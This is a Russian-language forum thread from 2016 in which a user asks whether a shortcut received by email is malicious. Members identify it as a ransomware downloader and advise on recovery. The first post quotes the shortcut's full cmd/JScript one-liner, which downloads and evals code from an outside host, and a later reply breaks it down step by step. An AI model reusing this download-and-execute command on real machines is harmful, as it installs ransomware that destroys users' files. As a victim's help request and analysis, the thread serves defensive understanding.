Перейти к содержимому


Фотография

Вирус или нет?

пришло по почте

11 ответов в этой теме

#1 gruzin

gruzin

    толстый тролль

  • True Members
  • PipPipPipPipPip
  • 2 012 сообщений
-69
Плохой
  • Пол:Мужчина
  • Город:СПб

Опубликовано 20 Июнь 2016 - 10:38

Всех приветствую.

 

Пришел по почте ярлычек в архиве.

Приведу скриншот и текст.

 

Вложенный файл  screen.PNG   28,27 КБ   1 Скачано

%windir%\system32\cmd.exe /c cd %TEMP%&echo. 2>s.js&echo var r = new ActiveXObject("Msxml2.ServerXMLHTTP.6.0");r.open("GET","http://download-file-mail.com/src/src",false);r.send^(^);var b = r.responseText;eval^(b^);>s.js&start s.js

Смутно понимаю, что эта шляпа хочет скачать и запустить файл s.js

 

Вопрос к экспертам, что именно происходит, после запуска такого "ярлычка"?


  • 0

#2 DarkTwin

DarkTwin

    Пернатый пЫнгвЫн

  • True Members
  • PipPipPipPipPip
  • 3 227 сообщений
293
Очень хороший
  • Пол:Мужчина

Опубликовано 20 Июнь 2016 - 10:47

Знаешь что такое "шифровальщик" ?

 

Ну или если легче будет то по версии Kaspersky  это  HEUR:Trojan-Downloader.Script.Generic


  • 0

"Люди забыли эту истину, - сказал Лис, - но ты не забывай: ты навсегда в ответе за всех, кого приручил..."

Антуан де Сент-Экзюпери. Маленький принц


#3 gruzin

gruzin

    толстый тролль

  • True Members
  • PipPipPipPipPip
  • 2 012 сообщений
-69
Плохой
  • Пол:Мужчина
  • Город:СПб

Опубликовано 20 Июнь 2016 - 11:21

Знаешь что такое "шифровальщик" ?

 

Ну или если легче будет то по версии Kaspersky  это  HEUR:Trojan-Downloader.Script.Generic

 

Не раз сталкивался с шифровальщиками.

Что делает скрипт в данном случае? Я ж не просто так спрашиваю.

 

Хотел я его проверить на вирустотал.ком, да, как идиот, распаковал и указал на него через эту форму

 

Ясен пень, проводничек взял, да и запустил этот код, вместо загрузки ярлыка.

Какой-то подозрительный setup.exe я в процессах убил, сижу и думаю теперь.

 

Вложенный файл  screen2.PNG   103,09 КБ   1 Скачано


  • 0

#4 DarkTwin

DarkTwin

    Пернатый пЫнгвЫн

  • True Members
  • PipPipPipPipPip
  • 3 227 сообщений
293
Очень хороший
  • Пол:Мужчина

Опубликовано 20 Июнь 2016 - 11:28

Строка в ярлыке скачивает js скрипт и запускает его. После чего файлы пользователя превращаются в кашу.


  • 0

"Люди забыли эту истину, - сказал Лис, - но ты не забывай: ты навсегда в ответе за всех, кого приручил..."

Антуан де Сент-Экзюпери. Маленький принц


#5 gruzin

gruzin

    толстый тролль

  • True Members
  • PipPipPipPipPip
  • 2 012 сообщений
-69
Плохой
  • Пол:Мужчина
  • Город:СПб

Опубликовано 20 Июнь 2016 - 11:30

Строка в ярлыке скачивает js скрипт и запускает его. После чего файлы пользователя превращаются в кашу.

 

Тогда у меня проблемы.


  • 0

#6 DarkTwin

DarkTwin

    Пернатый пЫнгвЫн

  • True Members
  • PipPipPipPipPip
  • 3 227 сообщений
293
Очень хороший
  • Пол:Мужчина

Опубликовано 20 Июнь 2016 - 11:37

Выключить комп.

Найти флешку или диск с антивирусами.

Запустить с диска\флешки проверку.

Возможно что еще не успел что то критичное "сожрать". 

Да и приличное количество шифровльщиков можно восстановить.


  • 0

"Люди забыли эту истину, - сказал Лис, - но ты не забывай: ты навсегда в ответе за всех, кого приручил..."

Антуан де Сент-Экзюпери. Маленький принц


#7 gruzin

gruzin

    толстый тролль

  • True Members
  • PipPipPipPipPip
  • 2 012 сообщений
-69
Плохой
  • Пол:Мужчина
  • Город:СПб

Опубликовано 20 Июнь 2016 - 11:38

Выключить комп.

Найти флешку или диск с антивирусами.

Запустить с диска\флешки проверку.

Возможно что еще не успел что то критичное "сожрать". 

Да и приличное количество шифровльщиков можно восстановить.

 

Расшифровать имеешь ввиду? Интересно, как?

 

Что характерно, virustotal этот архив уже видел, но не нашел ничего подозрительного.

 

Как ты файл вытащил?


  • 0

#8 DarkTwin

DarkTwin

    Пернатый пЫнгвЫн

  • True Members
  • PipPipPipPipPip
  • 3 227 сообщений
293
Очень хороший
  • Пол:Мужчина

Опубликовано 20 Июнь 2016 - 11:59


Расшифровать имеешь ввиду? Интересно, как?

http://antifraud.drw...cryption_trojs/

https://www.esetnod3...trojan_remover/

https://noransom.kaspersky.com/

 

Понятно что не все, но есть шанс.



Что характерно, virustotal этот архив уже видел, но не нашел ничего подозрительного.

Так не архив же, а http://download-file-mail.com/src/src


  • 0

"Люди забыли эту истину, - сказал Лис, - но ты не забывай: ты навсегда в ответе за всех, кого приручил..."

Антуан де Сент-Экзюпери. Маленький принц


#9 gruzin

gruzin

    толстый тролль

  • True Members
  • PipPipPipPipPip
  • 2 012 сообщений
-69
Плохой
  • Пол:Мужчина
  • Город:СПб

Опубликовано 20 Июнь 2016 - 12:38

Так не архив же, а http://download-file-mail.com/src/src


Вот каким образом на компе появляется тело вируса.
Этот весь текст сохранить файлом, с расширением .js и будет вирус, верно?
  • 0

#10 Yarra

Yarra

    Псих ненормальный

  • Moderators
  • PipPipPipPipPip
  • 13 162 сообщений
319
Очень хороший
  • Город:Степка 8)

Опубликовано 20 Июнь 2016 - 13:49

Я бы для таких экспериментов крайне рекомендовал иметь под рукой виртуалку.

Вот каким образом на компе появляется тело вируса.
Этот весь текст сохранить файлом, с расширением .js и будет вирус, верно?


В тобой же приведенном тексте все написано. Я не спец в запросах, но, имхо, вполне очевидно что:
1. открывается код
r.open("GET","http://download-file-mail.com/src/src",false)
2. сохраняется в файл s.js
r.send^(^);var b = r.responseText;eval^(b^);>s.js
3. запускается s.js
start s.js
Профит.

Вообще я даже по удаленке вычищал шифровальщиков. Просто быстро подключался, убивал нужный процесс (шифрование файла все же дело не совсем быстрое) и вычищал автозагрузку в спокойном режиме.
Но вот расшифровать не всегда выходило. Dr.Web на одиного шифровальщика спустя три месяца выдал программу анти-шифр. Для другого - нет. Ну, в прочем, пользователи сами виноваты. Нехер говно всякое запускать. Мозги иметь надо.
  • 0

Люди должны умереть
Убью лошадь, за каплю никотина


#11 gruzin

gruzin

    толстый тролль

  • True Members
  • PipPipPipPipPip
  • 2 012 сообщений
-69
Плохой
  • Пол:Мужчина
  • Город:СПб

Опубликовано 20 Июнь 2016 - 14:18

Мозги иметь надо, безусловно.
Спасибо всем за помощь.
  • 0

#12 DarkTwin

DarkTwin

    Пернатый пЫнгвЫн

  • True Members
  • PipPipPipPipPip
  • 3 227 сообщений
293
Очень хороший
  • Пол:Мужчина

Опубликовано 22 Июнь 2016 - 09:28

https://habrahabr.ru...et/blog/303752/


  • 0

"Люди забыли эту истину, - сказал Лис, - но ты не забывай: ты навсегда в ответе за всех, кого приручил..."

Антуан де Сент-Экзюпери. Маленький принц




Ответить в эту тему



  

Посетителей, читающих эту тему: 0

0 пользователей, 0 гостей, 0 анонимных пользователей